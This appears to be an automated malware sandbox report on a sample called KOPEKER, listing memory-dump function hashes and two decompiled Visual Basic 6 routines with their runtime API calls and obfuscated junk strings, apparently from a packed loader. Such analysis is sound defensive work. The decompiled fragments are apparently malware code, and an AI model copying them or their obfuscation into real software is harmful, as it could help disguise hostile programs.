          Uniqueness

          Uniqueness Score: -1.00%

          Function 006248A7, Relevance: .1, Instructions: 79COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d815b3b61d88162afe296cd362401f9faf35c4afd3e13b70b028d40c8ec72c00
          • Instruction ID: 26e11a1818d75e18780c8ce5ebbe42a036471545e9837dcbfa55bada2dfce0cf
          • Opcode Fuzzy Hash: d815b3b61d88162afe296cd362401f9faf35c4afd3e13b70b028d40c8ec72c00
          • Instruction Fuzzy Hash: 2311CE2A58CC77ADCB51652074527F7234B9B0A371F304019F8439B04AED8588C3BD39
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0062488B, Relevance: .1, Instructions: 78COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 41040a7ec9f3f66194590bf2c135abba1bc437404d8aa94c137d480354a4a16a
          • Instruction ID: 293858d6b0c94897cc2ab54b2a9ebf5acefcb07989cbdb98fb8bddb5d5d5a47c
          • Opcode Fuzzy Hash: 41040a7ec9f3f66194590bf2c135abba1bc437404d8aa94c137d480354a4a16a
          • Instruction Fuzzy Hash: 2711CE2A68CC77EDCB51652074523F7234B9F0A7A1F304019B8439B04AED8588C3BD3A
          Uniqueness

          Uniqueness Score: -1.00%

          Function 006248C3, Relevance: .1, Instructions: 77COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d7a2544709b31fdcd07574c3b9b81c8dac5428f07bdb215d900c9969394ad448
          • Instruction ID: e4e3f0cfec40fba66d55f613f1d402a42d39ab5f5274a729dd6372b15776f318
          • Opcode Fuzzy Hash: d7a2544709b31fdcd07574c3b9b81c8dac5428f07bdb215d900c9969394ad448
          • Instruction Fuzzy Hash: 6311892A68CC76ADC751656074527F7238B9B1A371F304019F8079B00AED8188C3BE39
          Uniqueness

          Uniqueness Score: -1.00%

          Function 006248E3, Relevance: .1, Instructions: 72COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 81e8cdcfab6af62d4b3bffd4719574eba1f3b7adec94ec2a81eb4682b86c040e
          • Instruction ID: 3af12dcc144f0d347bbff23be5a4318a5a8a30d7a7f0a89081ebabb9208bf316
          • Opcode Fuzzy Hash: 81e8cdcfab6af62d4b3bffd4719574eba1f3b7adec94ec2a81eb4682b86c040e
          • Instruction Fuzzy Hash: 88016D2958CC76ADC751656075517F7234B5B1A361F304019B8079B10ADD8188C7AE3D
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00624992, Relevance: .1, Instructions: 65COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b4a5c69f5f15138ecbfeb275529769ff637a7767fb7a3132a93019852cff3a5c
          • Instruction ID: 5ed00d71e81b0fc6c3b2adf3ad36aa6691977f7b25be87c590597c6291f5891f
          • Opcode Fuzzy Hash: b4a5c69f5f15138ecbfeb275529769ff637a7767fb7a3132a93019852cff3a5c
          • Instruction Fuzzy Hash: C9017B2A2CDC73EEC751652075923B62747DB1A361F308019E8879B40ADC854887AE3C
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00625D8B, Relevance: .1, Instructions: 63COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6a5bb2a4eb0dbd434302ab3c48e0867f324abce8c04678b1e12fa3948f4a24d0
          • Instruction ID: 577801196973aec3fa4812f609bb5bdb009b7dc58e86e7e9aaa830fce7f69725
          • Opcode Fuzzy Hash: 6a5bb2a4eb0dbd434302ab3c48e0867f324abce8c04678b1e12fa3948f4a24d0
          • Instruction Fuzzy Hash: E9014235649D32AEFB7920E864153E52647AF03360EB1001ECEC34244AA77905C35E5A
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00625D75, Relevance: .1, Instructions: 60COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0bea8d4b3b44715a5ef230252fcba2da1d0d1f3cc1df1b38cd407c3bd6002153
          • Instruction ID: e9fdeffdb1036d6489c0fb637aadf726cdbeb96949be1a43a6bfdafcfc09135b
          • Opcode Fuzzy Hash: 0bea8d4b3b44715a5ef230252fcba2da1d0d1f3cc1df1b38cd407c3bd6002153
          • Instruction Fuzzy Hash: AF012635649D329EFB7524E875153E53647EF033A0EB1441ECDC34204AA77905C35E5B
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00625DAE, Relevance: .1, Instructions: 57COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 77cb96f353fd1e10eb8a51891ad22a7fa017c0bb4befa4ec9a250ffa1a31e7b8
          • Instruction ID: 6675f09937810e48f61a764bf6ebcfe022906a0bbe75b32210405828829e0dc4
          • Opcode Fuzzy Hash: 77cb96f353fd1e10eb8a51891ad22a7fa017c0bb4befa4ec9a250ffa1a31e7b8
          • Instruction Fuzzy Hash: 19012625649E329EFB3515E864153E53A07AF07320BB2405ECDC386006A33849C35EA6
          Uniqueness

          Uniqueness Score: -1.00%

          Function 006249C7, Relevance: .1, Instructions: 54COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6f87a9fa5e5188f05cf74b1ac40bf5291756f5f426ae76c12e6f162f8772ac92
          • Instruction ID: 63385e113c25c566af74e5ab52689dbf3641ddcc91b22068cc33a5251aa9cf82
          • Opcode Fuzzy Hash: 6f87a9fa5e5188f05cf74b1ac40bf5291756f5f426ae76c12e6f162f8772ac92
          • Instruction Fuzzy Hash: B9F0C02A2CCCB39CC752612035513F607479B17375F304019E883AA44EEC864887BD3D
          Uniqueness

          Uniqueness Score: -1.00%

          Function 006249E7, Relevance: .1, Instructions: 51COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e62c7b4864c6815780742fa4be29103a2055caf5d430de236781047e99dbed87
          • Instruction ID: cafd0210cffb4c990145765f00819b9324f0495e8c2d3eca947247d390b76934
          • Opcode Fuzzy Hash: e62c7b4864c6815780742fa4be29103a2055caf5d430de236781047e99dbed87
          • Instruction Fuzzy Hash: C3F0592A2CDCB39CCB66612035513F516478B07375F304069A883AA44EEC86888B6D3D
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00624A0B, Relevance: .0, Instructions: 46COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f818dc492a5afcc9659b587429fddb1fd0c0bcd26948cb492218abfefcd2847f
          • Instruction ID: c72758f93310eb9415c1877dd09ad9aad774dacde8e379e2c1e443f51cce0505
          • Opcode Fuzzy Hash: f818dc492a5afcc9659b587429fddb1fd0c0bcd26948cb492218abfefcd2847f
          • Instruction Fuzzy Hash: 34F05C2B1DD8B39CC752616035513F51A439717336F308069D4939A44EECC6888BAD3D
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00624A2B, Relevance: .0, Instructions: 41COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b0f1bf31a21af89a67f2f94278d70454f423c603505315c058957774a9c3db4b
          • Instruction ID: 2f83a3f999aba14300e4614c70dd2ef3514b1dd5d033def0e5f900d829404465
          • Opcode Fuzzy Hash: b0f1bf31a21af89a67f2f94278d70454f423c603505315c058957774a9c3db4b
          • Instruction Fuzzy Hash: 7BF02B2A2CD8B39CC762512031513F516439B17776F308069D4979A14EEDC6888BAE3D
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00625F2A, Relevance: .0, Instructions: 34COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b292f11b1c0ea9bc109569a195f3fa00bc4744bf1900089535ca6ba31a017ba1
          • Instruction ID: 72a486ea7d354ab387701b4b4a6a040e8e09d47a5bc6d2ba7a66bb2c978ad093
          • Opcode Fuzzy Hash: b292f11b1c0ea9bc109569a195f3fa00bc4744bf1900089535ca6ba31a017ba1
          • Instruction Fuzzy Hash: 2EF05E35304E109FD324CA08E7C4FA673A3AF55750F964469EA46CB2A5E331EC81DE16
          Uniqueness

          Uniqueness Score: -1.00%

          Function 006231CC, Relevance: .0, Instructions: 9COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5ab3ebc256ac967514cafd81611fee360ba3def05a6d9a21550a5cfb65c88b5b
          • Instruction ID: 3cbf477bc3a0ea385c8db37673e458b0518ce45b03dcada08b228a867d8e5eef
          • Opcode Fuzzy Hash: 5ab3ebc256ac967514cafd81611fee360ba3def05a6d9a21550a5cfb65c88b5b
          • Instruction Fuzzy Hash: 1AC048BE391A909BEB15DB08D896A4073B1F700A84BA509A4E806DB751C32CEE4A9A01
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00625480, Relevance: .0, Instructions: 8COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_620000_KOPEKER.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c560d56505fae8080a04d611253409539bbf5e015d0e2a2deed310fe7cc64b1e
          • Instruction ID: ec95fd3b8600ab171419c010bd51b28c0f4dd363d3b01f07b336da74759d773f
          • Opcode Fuzzy Hash: c560d56505fae8080a04d611253409539bbf5e015d0e2a2deed310fe7cc64b1e
          • Instruction Fuzzy Hash: 05C04C31655C50CFCEA9DE09D1E0A68B3F6BB04751BD144A5E00787A51C224E885D901
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00415DD3, Relevance: 56.2, APIs: 28, Strings: 4, Instructions: 236COMMON
          Download Yara Rule
          C-Code - Quality: 51%
          			E00415DD3(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				void* _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char _v108;
				char* _v132;
				char _v140;
				intOrPtr _v148;
				char _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				intOrPtr* _v204;
				signed int _v208;
				signed int _t120;
				signed int _t131;
				char* _t138;
				char* _t139;
				signed int _t143;
				char* _t147;
				signed int _t150;
				signed int _t156;
				signed int _t161;
				signed int* _t165;
				intOrPtr _t182;
				long long* _t183;
				long long _t196;

				_t196 = __fp0;
				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t182;
				L004016F0();
				_v12 = _t182;
				_v8 = 0x401598;
				_v132 = L"8-8-8";
				_v140 = 8;
				_t165 =  &_v60;
				L004018A0();
				_push( &_v60);
				_push( &_v76);
				L004017E6();
				_v148 = 8;
				_v156 = 0x8002;
				_push( &_v76);
				_t120 =  &_v156;
				_push(_t120);
				L00401828();
				_v160 = _t120;
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L00401942();
				_t183 = _t182 + 0xc;
				if(_v160 != 0) {
					if( *0x4183d8 != 0) {
						_v188 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v188 = 0x4183d8;
					}
					_v160 =  *_v188;
					_t156 =  *((intOrPtr*)( *_v160 + 0x4c))(_v160,  &_v40);
					asm("fclex");
					_v164 = _t156;
					if(_v164 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x411ad0);
						_push(_v160);
						_push(_v164);
						L00401906();
						_v192 = _t156;
					}
					_v168 = _v40;
					_t161 =  *((intOrPtr*)( *_v168 + 0x24))(_v168, L"samtaleemnetsrhes", L"rebslagerierneshand",  &_v36);
					asm("fclex");
					_v172 = _t161;
					if(_v172 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x411dac);
						_push(_v168);
						_push(_v172);
						L00401906();
						_v196 = _t161;
					}
					_v180 = _v36;
					_v36 = _v36 & 0x00000000;
					L00401882();
					_t165 =  &_v40;
					L004018AC();
				}
				_push( &_v60);
				L004017DA();
				_push( &_v60);
				asm("fld1");
				_push(_t165);
				_push(_t165);
				 *_t183 = _t196;
				_push(0x411dc0);
				_push( &_v76);
				L004017E0();
				_push( &_v92);
				L004017DA();
				_v132 = 1;
				_v140 = 2;
				_push( &_v76);
				_push( &_v92);
				_push( &_v140);
				_t131 =  &_v108;
				_push(_t131);
				L004018E2();
				_push(_t131);
				L00401828();
				_v160 = _t131;
				_push( &_v108);
				_push( &_v76);
				_push( &_v92);
				_push( &_v60);
				_push(4);
				L00401942();
				if(_v160 != 0) {
					_t143 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v40);
					asm("fclex");
					_v160 = _t143;
					if(_v160 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x4105b8);
						_push(_a4);
						_push(_v160);
						L00401906();
						_v200 = _t143;
					}
					if( *0x4183d8 != 0) {
						_v204 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v204 = 0x4183d8;
					}
					_v164 =  *_v204;
					_v184 = _v40;
					_v40 = _v40 & 0x00000000;
					_t147 =  &_v44;
					L00401888();
					_t150 =  *((intOrPtr*)( *_v164 + 0x40))(_v164, _t147, _t147, _v184, L"UNSERIALIZABLE");
					asm("fclex");
					_v168 = _t150;
					if(_v168 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x411ad0);
						_push(_v164);
						_push(_v168);
						L00401906();
						_v208 = _t150;
					}
					L004018AC();
				}
				_push( &_v60);
				L004017DA();
				_t138 =  &_v60;
				_push(_t138);
				L004017D4();
				_v160 =  ~(0 | _t138 != 0x0000ffff);
				L00401912();
				_t139 = _v160;
				if(_t139 != 0) {
					_v132 = L"EXOCRINOLOGY";
					_v140 = 8;
					L004018A0();
					_push(2);
					_t139 =  &_v60;
					_push(_t139);
					L004018A6();
					_v28 = _t196;
					L00401912();
				}
				asm("wait");
				_push(0x4161bf);
				L00401924();
				return _t139;
			}











































          0x00415dd3
          0x00415dd8
          0x00415de3
          0x00415de4
          0x00415df0
          0x00415df8
          0x00415dfb
          0x00415e02
          0x00415e09
          0x00415e19
          0x00415e1c
          0x00415e24
          0x00415e28
          0x00415e29
          0x00415e2e
          0x00415e38
          0x00415e45
          0x00415e46
          0x00415e4c
          0x00415e4d
          0x00415e52
          0x00415e5c
          0x00415e60
          0x00415e61
          0x00415e63
          0x00415e68
          0x00415e74
          0x00415e81
          0x00415e9e
          0x00415e83
          0x00415e83
          0x00415e88
          0x00415e8d
          0x00415e92
          0x00415e92
          0x00415eb0
          0x00415ec8
          0x00415ecb
          0x00415ecd
          0x00415eda
          0x00415efc
          0x00415edc
          0x00415edc
          0x00415ede
          0x00415ee3
          0x00415ee9
          0x00415eef
          0x00415ef4
          0x00415ef4
          0x00415f06
          0x00415f28
          0x00415f2b
          0x00415f2d
          0x00415f3a
          0x00415f5c
          0x00415f3c
          0x00415f3c
          0x00415f3e
          0x00415f43
          0x00415f49
          0x00415f4f
          0x00415f54
          0x00415f54
          0x00415f66
          0x00415f6c
          0x00415f79
          0x00415f7e
          0x00415f81
          0x00415f81
          0x00415f89
          0x00415f8a
          0x00415f92
          0x00415f93
          0x00415f95
          0x00415f96
          0x00415f97
          0x00415f9a
          0x00415fa2
          0x00415fa3
          0x00415fab
          0x00415fac
          0x00415fb1
          0x00415fb8
          0x00415fc5
          0x00415fc9
          0x00415fd0
          0x00415fd1
          0x00415fd4
          0x00415fd5
          0x00415fda
          0x00415fdb
          0x00415fe0
          0x00415fea
          0x00415fee
          0x00415ff2
          0x00415ff6
          0x00415ff7
          0x00415ff9
          0x0041600a
          0x0041601c
          0x00416022
          0x00416024
          0x00416031
          0x00416053
          0x00416033
          0x00416033
          0x00416038
          0x0041603d
          0x00416040
          0x00416046
          0x0041604b
          0x0041604b
          0x00416061
          0x0041607e
          0x00416063
          0x00416063
          0x00416068
          0x0041606d
          0x00416072
          0x00416072
          0x00416090
          0x00416099
          0x0041609f
          0x004160ae
          0x004160b2
          0x004160c6
          0x004160c9
          0x004160cb
          0x004160d8
          0x004160fa
          0x004160da
          0x004160da
          0x004160dc
          0x004160e1
          0x004160e7
          0x004160ed
          0x004160f2
          0x004160f2
          0x00416104
          0x00416104
          0x0041610c
          0x0041610d
          0x00416112
          0x00416115
          0x00416116
          0x00416126
          0x00416130
          0x00416135
          0x0041613e
          0x00416140
          0x00416147
          0x0041615a
          0x0041615f
          0x00416161
          0x00416164
          0x00416165
          0x0041616a
          0x00416170
          0x00416170
          0x00416175
          0x00416176
          0x004161b9
          0x004161be

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415DF0
          • __vbaVarDup.MSVBVM60 ref: 00415E1C
          • #542.MSVBVM60(?,?), ref: 00415E29
          • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00415E4D
          • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00415E63
          • __vbaNew2.MSVBVM60(00411AE0,004183D8), ref: 00415E8D
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000004C), ref: 00415EEF
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411DAC,00000024), ref: 00415F4F
          • __vbaStrMove.MSVBVM60(00000000,?,00411DAC,00000024), ref: 00415F79
          • __vbaFreeObj.MSVBVM60(00000000,?,00411DAC,00000024), ref: 00415F81
          • #610.MSVBVM60(?), ref: 00415F8A
          • #661.MSVBVM60(?,00411DC0,?,?,?,?), ref: 00415FA3
          • #610.MSVBVM60(?,?,00411DC0,?,?,?,?), ref: 00415FAC
          • __vbaVarAdd.MSVBVM60(?,00000002,?,?), ref: 00415FD5
          • __vbaVarTstNe.MSVBVM60(00000000,?,00000002,?,?), ref: 00415FDB
          • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00000000,?,00000002,?,?), ref: 00415FF9
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,00000160), ref: 00416046
          • __vbaNew2.MSVBVM60(00411AE0,004183D8), ref: 0041606D
          • __vbaObjSet.MSVBVM60(?,?,UNSERIALIZABLE), ref: 004160B2
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000040), ref: 004160ED
          • __vbaFreeObj.MSVBVM60(00000000,?,00411AD0,00000040), ref: 00416104
          • #610.MSVBVM60(?,00411DC0,?,?,?,?), ref: 0041610D
          • #557.MSVBVM60(?,?,00411DC0,?,?,?,?), ref: 00416116
          • __vbaFreeVar.MSVBVM60(?,?,00411DC0,?,?,?,?), ref: 00416130
          • __vbaVarDup.MSVBVM60(?,?), ref: 0041615A
          • #600.MSVBVM60(?,00000002), ref: 00416165
          • __vbaFreeVar.MSVBVM60(?,00000002), ref: 00416170
          • __vbaFreeStr.MSVBVM60(004161BF,?,?,00411DC0,?,?,?,?), ref: 004161B9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$CheckHresult$#610$ListNew2$#542#557#600#661ChkstkMove
          • String ID: 8-8-8$UNSERIALIZABLE$rebslagerierneshand$samtaleemnetsrhes
          • API String ID: 1830445602-790280245
          • Opcode ID: 564fd277094097637ea71bec14d061d80f9c6640174a9b41bf714b12641776c3
          • Instruction ID: c541273776b1004c5d133e8dac987699c16e0419442bd701296478728087b1f2
          • Opcode Fuzzy Hash: 564fd277094097637ea71bec14d061d80f9c6640174a9b41bf714b12641776c3
          • Instruction Fuzzy Hash: 58A1C771D0021CAFDB10EBA1CC45BDEBBB8BF04704F5045AAE109B61A1DB799AC9CF59
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004167A5, Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 148COMMON
          Download Yara Rule
          C-Code - Quality: 59%
          			E004167A5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v40;
				short _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v60;
				char _v68;
				char _v84;
				char* _v108;
				intOrPtr _v116;
				intOrPtr _v124;
				char _v132;
				void* _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				intOrPtr _v156;
				intOrPtr* _v160;
				signed int _v164;
				signed int _v168;
				signed int _t74;
				short _t82;
				signed int _t85;
				signed int _t91;
				signed int _t96;
				intOrPtr _t121;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t121;
				L004016F0();
				_v12 = _t121;
				_v8 = 0x401640;
				_v60 = 0xe;
				_v68 = 2;
				_t74 =  &_v68;
				_push(_t74);
				L004017BC();
				L00401882();
				_push(_t74);
				_push(L"Out of string space");
				L0040184C();
				asm("sbb eax, eax");
				_v136 =  ~( ~( ~_t74));
				L00401924();
				L00401912();
				if(_v136 != 0) {
					_v108 = L"Statscheferstronhi8";
					_v116 = 8;
					L004018A0();
					_push( &_v68);
					_push( &_v84);
					L004017B6();
					L004018E8();
					L00401912();
				}
				_v108 = L"8-8-8";
				_v116 = 8;
				L004018A0();
				_push( &_v68);
				_push( &_v84);
				L004017E6();
				_v124 = 8;
				_v132 = 0x8002;
				_push( &_v84);
				_t82 =  &_v132;
				_push(_t82);
				L00401828();
				_v136 = _t82;
				_push( &_v84);
				_push( &_v68);
				_push(2);
				L00401942();
				_t85 = _v136;
				if(_t85 != 0) {
					if( *0x4183d8 != 0) {
						_v160 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v160 = 0x4183d8;
					}
					_v136 =  *_v160;
					_t91 =  *((intOrPtr*)( *_v136 + 0x4c))(_v136,  &_v52);
					asm("fclex");
					_v140 = _t91;
					if(_v140 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x411ad0);
						_push(_v136);
						_push(_v140);
						L00401906();
						_v164 = _t91;
					}
					_v144 = _v52;
					_t96 =  *((intOrPtr*)( *_v144 + 0x24))(_v144, L"Dedications3", L"Lumskes6",  &_v48);
					asm("fclex");
					_v148 = _t96;
					if(_v148 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x411dac);
						_push(_v144);
						_push(_v148);
						L00401906();
						_v168 = _t96;
					}
					_t85 = _v48;
					_v156 = _t85;
					_v48 = _v48 & 0x00000000;
					L00401882();
					L004018AC();
				}
				_v44 = 0x2a89;
				_push(0x416a1d);
				L00401924();
				L00401912();
				return _t85;
			}































          0x004167aa
          0x004167b5
          0x004167b6
          0x004167c2
          0x004167ca
          0x004167cd
          0x004167d4
          0x004167db
          0x004167e2
          0x004167e5
          0x004167e6
          0x004167f0
          0x004167f5
          0x004167f6
          0x004167fb
          0x00416802
          0x00416808
          0x00416812
          0x0041681a
          0x00416828
          0x0041682a
          0x00416831
          0x0041683e
          0x00416846
          0x0041684a
          0x0041684b
          0x00416856
          0x0041685e
          0x0041685e
          0x00416863
          0x0041686a
          0x00416877
          0x0041687f
          0x00416883
          0x00416884
          0x00416889
          0x00416890
          0x0041689a
          0x0041689b
          0x0041689e
          0x0041689f
          0x004168a4
          0x004168ae
          0x004168b2
          0x004168b3
          0x004168b5
          0x004168bd
          0x004168c6
          0x004168d3
          0x004168f0
          0x004168d5
          0x004168d5
          0x004168da
          0x004168df
          0x004168e4
          0x004168e4
          0x00416902
          0x0041691a
          0x0041691d
          0x0041691f
          0x0041692c
          0x0041694e
          0x0041692e
          0x0041692e
          0x00416930
          0x00416935
          0x0041693b
          0x00416941
          0x00416946
          0x00416946
          0x00416958
          0x0041697a
          0x0041697d
          0x0041697f
          0x0041698c
          0x004169ae
          0x0041698e
          0x0041698e
          0x00416990
          0x00416995
          0x0041699b
          0x004169a1
          0x004169a6
          0x004169a6
          0x004169b5
          0x004169b8
          0x004169be
          0x004169cb
          0x004169d3
          0x004169d3
          0x004169d8
          0x004169de
          0x00416a0f
          0x00416a17
          0x00416a1c

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004167C2
          • #651.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004167E6
          • __vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004167F0
          • __vbaStrCmp.MSVBVM60(Out of string space,00000000,00000002), ref: 004167FB
          • __vbaFreeStr.MSVBVM60(Out of string space,00000000,00000002), ref: 00416812
          • __vbaFreeVar.MSVBVM60(Out of string space,00000000,00000002), ref: 0041681A
          • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 0041683E
          • #666.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 0041684B
          • __vbaVarMove.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 00416856
          • __vbaFreeVar.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 0041685E
          • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 00416877
          • #542.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 00416884
          • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,00000002,?,?,?,?,?,?,?,?,?,Out of string space), ref: 0041689F
          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?,?,?,?,00000002), ref: 004168B5
